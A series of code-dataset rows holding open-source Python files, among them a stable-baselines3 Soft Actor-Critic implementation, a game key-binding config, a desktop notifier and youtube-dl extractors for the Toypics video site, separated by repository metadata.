    Soft Actor-Critic (SAC)
    Off-Policy Maximum Entropy Deep Reinforcement Learning with a Stochastic Actor,
    This implementation borrows code from original implementation (https://github.com/haarnoja/sac)
    from OpenAI Spinning Up (https://github.com/openai/spinningup), from the softlearning repo
    (https://github.com/rail-berkeley/softlearning/)
    and from Stable Baselines (https://github.com/hill-a/stable-baselines)
    Paper: https://arxiv.org/abs/1801.01290
    Introduction to SAC: https://spinningup.openai.com/en/latest/algorithms/sac.html
    Note: we use double q target and not value target as discussed
    in https://github.com/hill-a/stable-baselines/issues/270

    :param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)
    :param env: The environment to learn from (if registered in Gym, can be str)
    :param learning_rate: learning rate for adam optimizer,
        the same learning rate will be used for all networks (Q-Values, Actor and Value function)
        it can be a function of the current progress remaining (from 1 to 0)
    :param buffer_size: size of the replay buffer
    :param learning_starts: how many steps of the model to collect transitions for before learning starts
    :param batch_size: Minibatch size for each gradient update
    :param tau: the soft update coefficient ("Polyak update", between 0 and 1)
    :param gamma: the discount factor
    :param train_freq: Update the model every ``train_freq`` steps. Alternatively pass a tuple of frequency and unit
        like ``(5, "step")`` or ``(2, "episode")``.
    :param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)
        Set to ``-1`` means to do as many gradient steps as steps done in the environment
        during the rollout.
    :param action_noise: the action noise type (None by default), this can help
        for hard exploration problem. Cf common.noise for the different action noise type.
    :param replay_buffer_class: Replay buffer class to use (for instance ``HerReplayBuffer``).
        If ``None``, it will be automatically selected.
    :param replay_buffer_kwargs: Keyword arguments to pass to the replay buffer on creation.
    :param optimize_memory_usage: Enable a memory efficient variant of the replay buffer
        at a cost of more complexity.
        See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195
    :param ent_coef: Entropy regularization coefficient. (Equivalent to
        inverse of reward scale in the original SAC paper.) Controlling exploration/exploitation trade-off.
        Set it to 'auto' to learn it automatically (and 'auto_0.1' for using 0.1 as initial value)
    :param target_update_interval: update the target network every ``target_network_update_freq``
        gradient steps.
    :param target_entropy: target entropy when learning ``ent_coef`` (``ent_coef = 'auto'``)
    :param use_sde: Whether to use generalized State Dependent Exploration (gSDE)
        instead of action noise exploration (default: False)
    :param sde_sample_freq: Sample a new noise matrix every n steps when using gSDE
        Default: -1 (only sample at the beginning of the rollout)
    :param use_sde_at_warmup: Whether to use gSDE instead of uniform sampling
        during the warm up phase (before learning starts)
    :param create_eval_env: Whether to create a second environment that will be
        used for evaluating the agent periodically. (Only available when passing string for the environment)
    :param policy_kwargs: additional arguments to be passed to the policy on creation
    :param verbose: the verbosity level: 0 no output, 1 info, 2 debug
    :param seed: Seed for the pseudo random generators
    :param device: Device (cpu, cuda, ...) on which the code should be run.
        Setting it to auto, the code will be run on the GPU if possible.
    :param _init_setup_model: Whether or not to build the network at the creation of the instance
    """

    def __init__(
        self,
        policy: Union[str, Type[SACPolicy]],
        env: Union[GymEnv, str],
        learning_rate: Union[float, Schedule] = 3e-4,
        buffer_size: int = 1_000_000,  # 1e6
        learning_starts: int = 100,
        batch_size: int = 256,
        tau: float = 0.005,
        gamma: float = 0.99,
        train_freq: Union[int, Tuple[int, str]] = 1,
        gradient_steps: int = 1,
        action_noise: Optional[ActionNoise] = None,
        replay_buffer_class: Optional[ReplayBuffer] = None,
        replay_buffer_kwargs: Optional[Dict[str, Any]] = None,
        optimize_memory_usage: bool = False,
        ent_coef: Union[str, float] = "auto",
        target_update_interval: int = 1,
        target_entropy: Union[str, float] = "auto",
        use_sde: bool = False,
        sde_sample_freq: int = -1,
        use_sde_at_warmup: bool = False,
        tensorboard_log: Optional[str] = None,
        create_eval_env: bool = False,
        policy_kwargs: Optional[Dict[str, Any]] = None,
        verbose: int = 0,
        seed: Optional[int] = None,
        device: Union[th.device, str] = "auto",
        _init_setup_model: bool = True,
    ):
        super(SAC, self).__init__(
            policy,
            env,
            SACPolicy,
            learning_rate,
            buffer_size,
            learning_starts,
            batch_size,
            tau,
            gamma,
            train_freq,
            gradient_steps,
            action_noise,
            replay_buffer_class=replay_buffer_class,
            replay_buffer_kwargs=replay_buffer_kwargs,
            policy_kwargs=policy_kwargs,
            tensorboard_log=tensorboard_log,
            verbose=verbose,
            device=device,
            create_eval_env=create_eval_env,
            seed=seed,
            use_sde=use_sde,
            sde_sample_freq=sde_sample_freq,
            use_sde_at_warmup=use_sde_at_warmup,
            optimize_memory_usage=optimize_memory_usage,
            # Trailing comma makes this an actual one-element tuple;
            # `(gym.spaces.Box)` was just a parenthesized class.
            supported_action_spaces=(gym.spaces.Box,),
            support_multi_env=True,
        )

        self.target_entropy = target_entropy
        self.log_ent_coef = None  # type: Optional[th.Tensor]
        # Entropy coefficient / Entropy temperature
        # Inverse of the reward scale
        self.ent_coef = ent_coef
        self.target_update_interval = target_update_interval
        self.ent_coef_optimizer = None

        if _init_setup_model:
            self._setup_model()

    def _setup_model(self) -> None:
        """Build networks/buffer (via the parent) and set up the entropy coefficient."""
        super(SAC, self)._setup_model()
        self._create_aliases()
        # Target entropy is used when learning the entropy coefficient
        if self.target_entropy == "auto":
            # automatically set target entropy if needed
            self.target_entropy = -np.prod(self.env.action_space.shape).astype(np.float32)
        else:
            # Force conversion
            # this will also throw an error for unexpected string
            self.target_entropy = float(self.target_entropy)

        # The entropy coefficient or entropy can be learned automatically
        # see Automating Entropy Adjustment for Maximum Entropy RL section
        # of https://arxiv.org/abs/1812.05905
        if isinstance(self.ent_coef, str) and self.ent_coef.startswith("auto"):
            # Default initial value of ent_coef when learned
            init_value = 1.0
            if "_" in self.ent_coef:
                init_value = float(self.ent_coef.split("_")[1])
                assert init_value > 0.0, "The initial value of ent_coef must be greater than 0"

            # Note: we optimize the log of the entropy coeff which is slightly different from the paper
            # as discussed in https://github.com/rail-berkeley/softlearning/issues/37
            self.log_ent_coef = th.log(th.ones(1, device=self.device) * init_value).requires_grad_(True)
            self.ent_coef_optimizer = th.optim.Adam([self.log_ent_coef], lr=self.lr_schedule(1))
        else:
            # Force conversion to float
            # this will throw an error if a malformed string (different from 'auto')
            # is passed
            self.ent_coef_tensor = th.tensor(float(self.ent_coef)).to(self.device)

    def _create_aliases(self) -> None:
        """Expose the policy's sub-networks as attributes of the algorithm."""
        self.actor = self.policy.actor
        self.critic = self.policy.critic
        self.critic_target = self.policy.critic_target

    def train(self, gradient_steps: int, batch_size: int = 64) -> None:
        """Run ``gradient_steps`` updates of entropy coefficient, critics and actor."""
        # Switch to train mode (this affects batch norm / dropout)
        self.policy.set_training_mode(True)
        # Update optimizers learning rate
        optimizers = [self.actor.optimizer, self.critic.optimizer]
        if self.ent_coef_optimizer is not None:
            optimizers += [self.ent_coef_optimizer]

        # Update learning rate according to lr schedule
        self._update_learning_rate(optimizers)

        ent_coef_losses, ent_coefs = [], []
        actor_losses, critic_losses = [], []

        for gradient_step in range(gradient_steps):
            # Sample replay buffer
            replay_data = self.replay_buffer.sample(batch_size, env=self._vec_normalize_env)

            # We need to sample because `log_std` may have changed between two gradient steps
            if self.use_sde:
                self.actor.reset_noise()

            # Action by the current actor for the sampled state
            actions_pi, log_prob = self.actor.action_log_prob(replay_data.observations)
            log_prob = log_prob.reshape(-1, 1)

            ent_coef_loss = None
            if self.ent_coef_optimizer is not None:
                # Important: detach the variable from the graph
                # so we don't change it with other losses
                # see https://github.com/rail-berkeley/softlearning/issues/60
                ent_coef = th.exp(self.log_ent_coef.detach())
                ent_coef_loss = -(self.log_ent_coef * (log_prob + self.target_entropy).detach()).mean()
                ent_coef_losses.append(ent_coef_loss.item())
            else:
                ent_coef = self.ent_coef_tensor

            ent_coefs.append(ent_coef.item())

            # Optimize entropy coefficient, also called
            # entropy temperature or alpha in the paper
            if ent_coef_loss is not None:
                self.ent_coef_optimizer.zero_grad()
                ent_coef_loss.backward()
                self.ent_coef_optimizer.step()

            with th.no_grad():
                # Select action according to policy
                next_actions, next_log_prob = self.actor.action_log_prob(replay_data.next_observations)
                # Compute the next Q values: min over all critics targets
                next_q_values = th.cat(self.critic_target(replay_data.next_observations, next_actions), dim=1)
                next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)
                # add entropy term
                next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)
                # td error + entropy term
                target_q_values = replay_data.rewards + (1 - replay_data.dones) * self.gamma * next_q_values

            # Get current Q-values estimates for each critic network
            # using action from the replay buffer
            current_q_values = self.critic(replay_data.observations, replay_data.actions)

            # Compute critic loss
            critic_loss = 0.5 * sum([F.mse_loss(current_q, target_q_values) for current_q in current_q_values])
            critic_losses.append(critic_loss.item())

            # Optimize the critic
            self.critic.optimizer.zero_grad()
            critic_loss.backward()
            self.critic.optimizer.step()

            # Compute actor loss
            # Alternative: actor_loss = th.mean(log_prob - qf1_pi)
            # Mean over all critic networks
            q_values_pi = th.cat(self.critic.forward(replay_data.observations, actions_pi), dim=1)
            min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)
            actor_loss = (ent_coef * log_prob - min_qf_pi).mean()
            actor_losses.append(actor_loss.item())

            # Optimize the actor
            self.actor.optimizer.zero_grad()
            actor_loss.backward()
            self.actor.optimizer.step()

            # Update target networks
            if gradient_step % self.target_update_interval == 0:
                polyak_update(self.critic.parameters(), self.critic_target.parameters(), self.tau)

        self._n_updates += gradient_steps

        self.logger.record("train/n_updates", self._n_updates, exclude="tensorboard")
        self.logger.record("train/ent_coef", np.mean(ent_coefs))
        self.logger.record("train/actor_loss", np.mean(actor_losses))
        self.logger.record("train/critic_loss", np.mean(critic_losses))
        if len(ent_coef_losses) > 0:
            self.logger.record("train/ent_coef_loss", np.mean(ent_coef_losses))

    def learn(
        self,
        total_timesteps: int,
        callback: MaybeCallback = None,
        log_interval: int = 4,
        eval_env: Optional[GymEnv] = None,
        eval_freq: int = -1,
        n_eval_episodes: int = 5,
        tb_log_name: str = "SAC",
        eval_log_path: Optional[str] = None,
        reset_num_timesteps: bool = True,
    ) -> OffPolicyAlgorithm:
        """Delegate to the generic off-policy training loop with SAC defaults."""
        return super(SAC, self).learn(
            total_timesteps=total_timesteps,
            callback=callback,
            log_interval=log_interval,
            eval_env=eval_env,
            eval_freq=eval_freq,
            n_eval_episodes=n_eval_episodes,
            tb_log_name=tb_log_name,
            eval_log_path=eval_log_path,
            reset_num_timesteps=reset_num_timesteps,
        )

    def _excluded_save_params(self) -> List[str]:
        """Exclude the network aliases — they are saved as part of the policy."""
        return super(SAC, self)._excluded_save_params() + ["actor", "critic", "critic_target"]

    def _get_torch_save_params(self) -> Tuple[List[str], List[str]]:
        """Return the state-dict names and extra tensors/optimizers to serialize."""
        state_dicts = ["policy", "actor.optimizer", "critic.optimizer"]
        if self.ent_coef_optimizer is not None:
            saved_pytorch_variables = ["log_ent_coef"]
            state_dicts.append("ent_coef_optimizer")
        else:
            saved_pytorch_variables = ["ent_coef_tensor"]
        return state_dicts, saved_pytorch_variables
| 47.431746
| 116
| 0.658122
|
from typing import Any, Dict, List, Optional, Tuple, Type, Union
import gym
import numpy as np
import torch as th
from torch.nn import functional as F
from stable_baselines3.common.buffers import ReplayBuffer
from stable_baselines3.common.noise import ActionNoise
from stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm
from stable_baselines3.common.type_aliases import GymEnv, MaybeCallback, Schedule
from stable_baselines3.common.utils import polyak_update
from stable_baselines3.sac.policies import SACPolicy
class SAC(OffPolicyAlgorithm):
def __init__(
self,
policy: Union[str, Type[SACPolicy]],
env: Union[GymEnv, str],
learning_rate: Union[float, Schedule] = 3e-4,
buffer_size: int = 1_000_000,
learning_starts: int = 100,
batch_size: int = 256,
tau: float = 0.005,
gamma: float = 0.99,
train_freq: Union[int, Tuple[int, str]] = 1,
gradient_steps: int = 1,
action_noise: Optional[ActionNoise] = None,
replay_buffer_class: Optional[ReplayBuffer] = None,
replay_buffer_kwargs: Optional[Dict[str, Any]] = None,
optimize_memory_usage: bool = False,
ent_coef: Union[str, float] = "auto",
target_update_interval: int = 1,
target_entropy: Union[str, float] = "auto",
use_sde: bool = False,
sde_sample_freq: int = -1,
use_sde_at_warmup: bool = False,
tensorboard_log: Optional[str] = None,
create_eval_env: bool = False,
policy_kwargs: Optional[Dict[str, Any]] = None,
verbose: int = 0,
seed: Optional[int] = None,
device: Union[th.device, str] = "auto",
_init_setup_model: bool = True,
):
super(SAC, self).__init__(
policy,
env,
SACPolicy,
learning_rate,
buffer_size,
learning_starts,
batch_size,
tau,
gamma,
train_freq,
gradient_steps,
action_noise,
replay_buffer_class=replay_buffer_class,
replay_buffer_kwargs=replay_buffer_kwargs,
policy_kwargs=policy_kwargs,
tensorboard_log=tensorboard_log,
verbose=verbose,
device=device,
create_eval_env=create_eval_env,
seed=seed,
use_sde=use_sde,
sde_sample_freq=sde_sample_freq,
use_sde_at_warmup=use_sde_at_warmup,
optimize_memory_usage=optimize_memory_usage,
supported_action_spaces=(gym.spaces.Box),
support_multi_env=True,
)
self.target_entropy = target_entropy
self.log_ent_coef = None
self.ent_coef = ent_coef
self.target_update_interval = target_update_interval
self.ent_coef_optimizer = None
if _init_setup_model:
self._setup_model()
def _setup_model(self) -> None:
super(SAC, self)._setup_model()
self._create_aliases()
if self.target_entropy == "auto":
self.target_entropy = -np.prod(self.env.action_space.shape).astype(np.float32)
else:
self.target_entropy = float(self.target_entropy)
if isinstance(self.ent_coef, str) and self.ent_coef.startswith("auto"):
init_value = 1.0
if "_" in self.ent_coef:
init_value = float(self.ent_coef.split("_")[1])
assert init_value > 0.0, "The initial value of ent_coef must be greater than 0"
self.log_ent_coef = th.log(th.ones(1, device=self.device) * init_value).requires_grad_(True)
self.ent_coef_optimizer = th.optim.Adam([self.log_ent_coef], lr=self.lr_schedule(1))
else:
self.ent_coef_tensor = th.tensor(float(self.ent_coef)).to(self.device)
def _create_aliases(self) -> None:
self.actor = self.policy.actor
self.critic = self.policy.critic
self.critic_target = self.policy.critic_target
    def train(self, gradient_steps: int, batch_size: int = 64) -> None:
        """Run SAC gradient updates on batches sampled from the replay buffer.

        Each step updates, in order: the entropy coefficient (if learned),
        the critics, the actor, and (periodically) the target critics.

        :param gradient_steps: number of gradient updates to perform.
        :param batch_size: size of each replay-buffer sample.
        """
        # Switch to train mode (this affects batch norm / dropout)
        self.policy.set_training_mode(True)
        # Update optimizers learning rate according to the current schedule.
        optimizers = [self.actor.optimizer, self.critic.optimizer]
        if self.ent_coef_optimizer is not None:
            optimizers += [self.ent_coef_optimizer]
        self._update_learning_rate(optimizers)
        # Per-step diagnostics, averaged and logged at the end.
        ent_coef_losses, ent_coefs = [], []
        actor_losses, critic_losses = [], []
        for gradient_step in range(gradient_steps):
            # Sample replay buffer (normalized by the VecNormalize wrapper, if any).
            replay_data = self.replay_buffer.sample(batch_size, env=self._vec_normalize_env)
            # We need to sample because `log_std` may have changed between two gradient steps
            if self.use_sde:
                self.actor.reset_noise()
            # Action by the current actor for the sampled state
            actions_pi, log_prob = self.actor.action_log_prob(replay_data.observations)
            log_prob = log_prob.reshape(-1, 1)
            ent_coef_loss = None
            if self.ent_coef_optimizer is not None:
                # Important: detach the variable from the graph
                # so we don't change it with other losses
                # see https://github.com/rail-berkeley/softlearning/issues/60
                ent_coef = th.exp(self.log_ent_coef.detach())
                ent_coef_loss = -(self.log_ent_coef * (log_prob + self.target_entropy).detach()).mean()
                ent_coef_losses.append(ent_coef_loss.item())
            else:
                ent_coef = self.ent_coef_tensor
            ent_coefs.append(ent_coef.item())
            # Optimize entropy coefficient, also called
            # entropy temperature or alpha in the paper
            if ent_coef_loss is not None:
                self.ent_coef_optimizer.zero_grad()
                ent_coef_loss.backward()
                self.ent_coef_optimizer.step()
            with th.no_grad():
                # Select action according to policy
                next_actions, next_log_prob = self.actor.action_log_prob(replay_data.next_observations)
                # Compute the next Q values: min over all critics targets
                next_q_values = th.cat(self.critic_target(replay_data.next_observations, next_actions), dim=1)
                next_q_values, _ = th.min(next_q_values, dim=1, keepdim=True)
                # add entropy term
                next_q_values = next_q_values - ent_coef * next_log_prob.reshape(-1, 1)
                # td error + entropy term
                target_q_values = replay_data.rewards + (1 - replay_data.dones) * self.gamma * next_q_values
            # Get current Q-values estimates for each critic network
            # using action from the replay buffer
            current_q_values = self.critic(replay_data.observations, replay_data.actions)
            # Compute critic loss
            critic_loss = 0.5 * sum([F.mse_loss(current_q, target_q_values) for current_q in current_q_values])
            critic_losses.append(critic_loss.item())
            # Optimize the critic
            self.critic.optimizer.zero_grad()
            critic_loss.backward()
            self.critic.optimizer.step()
            # Compute actor loss
            # Alternative: actor_loss = th.mean(log_prob - qf1_pi)
            # Mean over all critic networks
            q_values_pi = th.cat(self.critic.forward(replay_data.observations, actions_pi), dim=1)
            min_qf_pi, _ = th.min(q_values_pi, dim=1, keepdim=True)
            actor_loss = (ent_coef * log_prob - min_qf_pi).mean()
            actor_losses.append(actor_loss.item())
            # Optimize the actor
            self.actor.optimizer.zero_grad()
            actor_loss.backward()
            self.actor.optimizer.step()
            # Update target networks
            if gradient_step % self.target_update_interval == 0:
                polyak_update(self.critic.parameters(), self.critic_target.parameters(), self.tau)
        self._n_updates += gradient_steps
        self.logger.record("train/n_updates", self._n_updates, exclude="tensorboard")
        self.logger.record("train/ent_coef", np.mean(ent_coefs))
        self.logger.record("train/actor_loss", np.mean(actor_losses))
        self.logger.record("train/critic_loss", np.mean(critic_losses))
        if len(ent_coef_losses) > 0:
            self.logger.record("train/ent_coef_loss", np.mean(ent_coef_losses))
def learn(
self,
total_timesteps: int,
callback: MaybeCallback = None,
log_interval: int = 4,
eval_env: Optional[GymEnv] = None,
eval_freq: int = -1,
n_eval_episodes: int = 5,
tb_log_name: str = "SAC",
eval_log_path: Optional[str] = None,
reset_num_timesteps: bool = True,
) -> OffPolicyAlgorithm:
return super(SAC, self).learn(
total_timesteps=total_timesteps,
callback=callback,
log_interval=log_interval,
eval_env=eval_env,
eval_freq=eval_freq,
n_eval_episodes=n_eval_episodes,
tb_log_name=tb_log_name,
eval_log_path=eval_log_path,
reset_num_timesteps=reset_num_timesteps,
)
def _excluded_save_params(self) -> List[str]:
return super(SAC, self)._excluded_save_params() + ["actor", "critic", "critic_target"]
def _get_torch_save_params(self) -> Tuple[List[str], List[str]]:
state_dicts = ["policy", "actor.optimizer", "critic.optimizer"]
if self.ent_coef_optimizer is not None:
saved_pytorch_variables = ["log_ent_coef"]
state_dicts.append("ent_coef_optimizer")
else:
saved_pytorch_variables = ["ent_coef_tensor"]
return state_dicts, saved_pytorch_variables
| true
| true
|
f7059d8c63468534c4d5a45f70eb14aa1a9ab387
| 1,065
|
py
|
Python
|
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | 2
|
2021-08-16T06:25:04.000Z
|
2021-08-17T01:28:53.000Z
|
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | null | null | null |
constants.py
|
ra101/Pose2Input-MKKE
|
11905d19fbc18acc8b577f41d3149013cca76aab
|
[
"MIT"
] | null | null | null |
# ./constants.py
import os
import enum
from dotenv import load_dotenv
load_dotenv()
@enum.unique
class InputConfig(enum.Enum):
    """Key bindings for the game, overridable through .env / environment variables.

    Each member's value is a key name usable by pyAutoGUI. When the matching
    environment variable is unset, the author's default binding applies
    (yes, that includes the arrow keys — deal with it!). Values are lowercased
    so bindings are case-insensitive in the .env file.
    """
    DEFAULT = ''
    UP = os.environ.get('UP', 'up').lower()
    DOWN = os.environ.get('DOWN', 'down').lower()
    LEFT = os.environ.get('LEFT', 'left').lower()
    RIGHT = os.environ.get('RIGHT', 'right').lower()
    FRONT_PUNCH = os.environ.get('FRONT_PUNCH', 'a').lower()
    BACK_PUNCH = os.environ.get('BACK_PUNCH', 's').lower()
    FRONT_KICK = os.environ.get('FRONT_KICK', 'z').lower()
    BACK_KICK = os.environ.get('BACK_KICK', 'x').lower()
    THROW = os.environ.get('THROW', 'd').lower()
    TAG = os.environ.get('TAG', 'c').lower()
    BLOCK = os.environ.get('BLOCK', 'space').lower()
    FLIP_STANCE = os.environ.get('FLIP_STANCE', 'ctrlright').lower()
    PAUSE = os.environ.get('PAUSE', 'tab').lower()
    BACK = os.environ.get('BACK', 'backspace').lower()
| 30.428571
| 63
| 0.62723
|
import os
import enum
from dotenv import load_dotenv
load_dotenv()
@enum.unique
class InputConfig(enum.Enum):
DEFAULT = ''
UP = os.getenv('UP', 'up').lower()
DOWN = os.getenv('DOWN', 'down').lower()
LEFT = os.getenv('LEFT', 'left').lower()
RIGHT = os.getenv('RIGHT', 'right').lower()
FRONT_PUNCH = os.getenv('FRONT_PUNCH', 'a').lower()
BACK_PUNCH = os.getenv('BACK_PUNCH', 's').lower()
FRONT_KICK = os.getenv('FRONT_KICK', 'z').lower()
BACK_KICK = os.getenv('BACK_KICK', 'x').lower()
THROW = os.getenv('THROW', 'd').lower()
TAG = os.getenv('TAG', 'c').lower()
BLOCK = os.getenv('BLOCK', 'space').lower()
FLIP_STANCE = os.getenv('FLIP_STANCE', 'ctrlright').lower()
PAUSE = os.getenv('PAUSE', 'tab').lower()
BACK = os.getenv('BACK', 'backspace').lower()
| true
| true
|
f7059f70f021d953948645a9e129f288f86fa8ff
| 572
|
py
|
Python
|
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
src/airflow_actionproject/hooks/__init__.py
|
actionprojecteu/airflow-actionproject
|
6518e73e5709ebce927e0b463b5e36d80194491c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------
# Copyright (c) 2021
#
# See the LICENSE file for details
# see the AUTHORS file for authors
# ----------------------------------------------------------------------
#--------------------
# System wide imports
# -------------------
# ---------------
# Airflow imports
# ---------------
#--------------
# local imports
# -------------
# -----------------------
# Module global variables
# -----------------------
# ----------------
# Module constants
# ----------------
| 19.724138
| 72
| 0.274476
| true
| true
|
|
f7059fa1462d4d297a6397aa32f4f05bb16f2d55
| 492
|
py
|
Python
|
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
Programs/Desktop_Notifier.py
|
Phinix403/Python
|
64dec2dfb47a966a603dcdf1c65b32a7e3184672
|
[
"MIT"
] | null | null | null |
# Install Notification Module - pip install notify2
import notify2
import time
import os
notify2.init('Notification')
icon_path = os.getcwd() + "/icon.ico"
def notiFunc():
    """Show the Techix subscribe notification, then linger so it stays visible.

    Bug fix: notify2 transmits the expire-timeout hint with the D-Bus Notify
    call issued by show(), so set_timeout() must be configured *before*
    show() for the 15 s expiry to take effect; calling it afterwards only
    affects a future show().
    """
    noti = notify2.Notification("Welcome to Techix", "Techix is an Tech Dependent Youtube Channel, Please Subscribe to get more Videos Frequently.", icon=icon_path)
    noti.set_urgency(notify2.URGENCY_NORMAL)
    # Configure the notification fully before displaying it.
    noti.set_timeout(15000)
    noti.show()
    # Keep the process alive so the notification is not torn down immediately.
    time.sleep(120)
if __name__ == "__main__":
notiFunc()
| 25.894737
| 164
| 0.73374
|
import notify2
import time
import os
notify2.init('Notification')
icon_path = os.getcwd() + "/icon.ico"
def notiFunc():
noti = notify2.Notification("Welcome to Techix", "Techix is an Tech Dependent Youtube Channel, Please Subscribe to get more Videos Frequently.", icon=icon_path)
noti.set_urgency(notify2.URGENCY_NORMAL)
noti.show()
noti.set_timeout(15000)
time.sleep(120)
if __name__ == "__main__":
notiFunc()
| true
| true
|
f705a06c95a7d04645d3ccb50784ff444cc6e934
| 2,746
|
py
|
Python
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 66,635
|
2019-03-10T21:34:18.000Z
|
2022-03-31T23:50:31.000Z
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 10,936
|
2019-03-10T21:35:47.000Z
|
2022-03-31T23:46:52.000Z
|
youtube_dl/extractor/toypics.py
|
hackarada/youtube-dl
|
2ba46715a41fe074eab2221170b2ac78fab93fad
|
[
"Unlicense"
] | 15,194
|
2019-03-10T21:09:27.000Z
|
2022-03-31T22:13:49.000Z
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
import re
class ToypicsIE(InfoExtractor):
    # Extractor for a single Toypics video page.
    IE_DESC = 'Toypics video'
    _VALID_URL = r'https?://videos\.toypics\.net/view/(?P<id>[0-9]+)'
    _TEST = {
        'url': 'http://videos.toypics.net/view/514/chancebulged,-2-1/',
        'md5': '16e806ad6d6f58079d210fe30985e08b',
        'info_dict': {
            'id': '514',
            'ext': 'mp4',
            'title': "Chance-Bulge'd, 2",
            'age_limit': 18,
            'uploader': 'kidsune',
        }
    }

    def _real_extract(self, url):
        video_id = self._match_id(url)
        page = self._download_webpage(url, video_id)
        # The HTML5 <video>/<source> tags carry the actual media URLs.
        media_entries = self._parse_html5_media_entries(url, page, video_id)
        title = self._html_search_regex(
            [r'<h1[^>]+class=["\']view-video-title[^>]+>([^<]+)</h',
             r'<title>([^<]+) - Toypics</title>'],
            page, 'title')
        # The uploader line is optional on some pages, hence fatal=False.
        uploader = self._html_search_regex(
            r'More videos from <strong>([^<]+)</strong>', page, 'uploader',
            fatal=False)
        info = {
            'id': video_id,
            'title': title,
            'uploader': uploader,
            'age_limit': 18,
        }
        info['formats'] = media_entries[0]['formats']
        return info
class ToypicsUserIE(InfoExtractor):
    # Extracts a user's public videos as a playlist of Toypics video URLs.
    IE_DESC = 'Toypics user profile'
    _VALID_URL = r'https?://videos\.toypics\.net/(?!view)(?P<id>[^/?#&]+)'
    _TEST = {
        'url': 'http://videos.toypics.net/Mikey',
        'info_dict': {
            'id': 'Mikey',
        },
        'playlist_mincount': 19,
    }

    def _real_extract(self, url):
        username = self._match_id(url)
        profile_page = self._download_webpage(
            url, username, note='Retrieving profile page')
        # Total public-video count, scraped from the profile sidebar.
        video_count = int(self._search_regex(
            r'public/">Public Videos \(([0-9]+)\)</a></li>', profile_page,
            'video count'))
        # Pagination is 1-based with 8 videos per page.
        PAGE_SIZE = 8
        urls = []
        # NOTE(review): this is not plain ceiling division
        # ((count + PAGE_SIZE - 1) // PAGE_SIZE); the extra +2 in the numerator
        # fetches one page beyond the computed need when count is a multiple
        # of 8. Possibly a deliberate safety margin for a stale count — confirm
        # before "fixing".
        page_count = (video_count + PAGE_SIZE + 1) // PAGE_SIZE
        for n in range(1, page_count + 1):
            lpage_url = url + '/public/%d' % n
            lpage = self._download_webpage(
                lpage_url, username,
                note='Downloading page %d/%d' % (n, page_count))
            # Collect every video link in the page's preview grid.
            urls.extend(
                re.findall(
                    r'<div[^>]+class=["\']preview[^>]+>\s*<a[^>]+href="(https?://videos\.toypics\.net/view/[^"]+)"',
                    lpage))
        # Defer per-video extraction to ToypicsIE via url-type entries.
        return {
            '_type': 'playlist',
            'id': username,
            'entries': [{
                '_type': 'url',
                'url': eurl,
                'ie_key': 'Toypics',
            } for eurl in urls]
        }
| 30.175824
| 116
| 0.499636
|
from __future__ import unicode_literals
from .common import InfoExtractor
import re
class ToypicsIE(InfoExtractor):
IE_DESC = 'Toypics video'
_VALID_URL = r'https?://videos\.toypics\.net/view/(?P<id>[0-9]+)'
_TEST = {
'url': 'http://videos.toypics.net/view/514/chancebulged,-2-1/',
'md5': '16e806ad6d6f58079d210fe30985e08b',
'info_dict': {
'id': '514',
'ext': 'mp4',
'title': "Chance-Bulge'd, 2",
'age_limit': 18,
'uploader': 'kidsune',
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
formats = self._parse_html5_media_entries(
url, webpage, video_id)[0]['formats']
title = self._html_search_regex([
r'<h1[^>]+class=["\']view-video-title[^>]+>([^<]+)</h',
r'<title>([^<]+) - Toypics</title>',
], webpage, 'title')
uploader = self._html_search_regex(
r'More videos from <strong>([^<]+)</strong>', webpage, 'uploader',
fatal=False)
return {
'id': video_id,
'formats': formats,
'title': title,
'uploader': uploader,
'age_limit': 18,
}
class ToypicsUserIE(InfoExtractor):
IE_DESC = 'Toypics user profile'
_VALID_URL = r'https?://videos\.toypics\.net/(?!view)(?P<id>[^/?#&]+)'
_TEST = {
'url': 'http://videos.toypics.net/Mikey',
'info_dict': {
'id': 'Mikey',
},
'playlist_mincount': 19,
}
def _real_extract(self, url):
username = self._match_id(url)
profile_page = self._download_webpage(
url, username, note='Retrieving profile page')
video_count = int(self._search_regex(
r'public/">Public Videos \(([0-9]+)\)</a></li>', profile_page,
'video count'))
PAGE_SIZE = 8
urls = []
page_count = (video_count + PAGE_SIZE + 1) // PAGE_SIZE
for n in range(1, page_count + 1):
lpage_url = url + '/public/%d' % n
lpage = self._download_webpage(
lpage_url, username,
note='Downloading page %d/%d' % (n, page_count))
urls.extend(
re.findall(
r'<div[^>]+class=["\']preview[^>]+>\s*<a[^>]+href="(https?://videos\.toypics\.net/view/[^"]+)"',
lpage))
return {
'_type': 'playlist',
'id': username,
'entries': [{
'_type': 'url',
'url': eurl,
'ie_key': 'Toypics',
} for eurl in urls]
}
| true
| true
|
f705a0bdf5f2e9c98e441ea76e922c6518a8fec9
| 6,654
|
py
|
Python
